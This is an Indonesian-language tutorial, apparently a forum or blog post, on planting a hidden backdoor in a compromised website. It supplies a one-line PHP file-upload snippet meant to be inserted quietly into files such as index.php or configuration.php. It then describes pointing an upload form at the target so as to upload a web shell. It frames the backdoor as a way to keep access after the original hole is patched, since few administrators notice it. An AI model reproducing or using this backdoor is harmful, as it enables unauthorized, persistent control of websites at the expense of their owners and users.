Membuat backdoor csrf didalam script

Membuat backdoor csrf didalam script

Masukan syntax code dibawah ini :

<?php @copy(@$_FILES['x']['tmp_name'],@$_FILES['x']['name']); ?>

Didalam script webshit seperti index.php, configuration.php dll. Dengan tidak merusak isi dari script tersebut.

Setelah di save pada script yang telah tertanam syntax code tersebut, kita beralih ke script csrf dan masukan link webnya dan tempat kita menaruh syntax code tersebut pada bagian form. Contoh :

Form action="Target.com/index.php"

Lalu, kita buka dibrowser dan upload shell kita menggunakan script csrf tersebut.

Hal ini sebenarnya bertujuan untuk membuat bug csrf agar saat vulnerability pada web telah di path, kita sudah mempunyai backdoor pada web tersebut.

Ini cara yang old but gold :D
biar jadul tapi tetep powerful :D
Karena jarang ada admin yang sadar tentang ini. Hanya admin yang teliti dan mau ribet mencari cari vuln hingga ke dalam scriptnya :v

Sekian dan selamat mencoba :)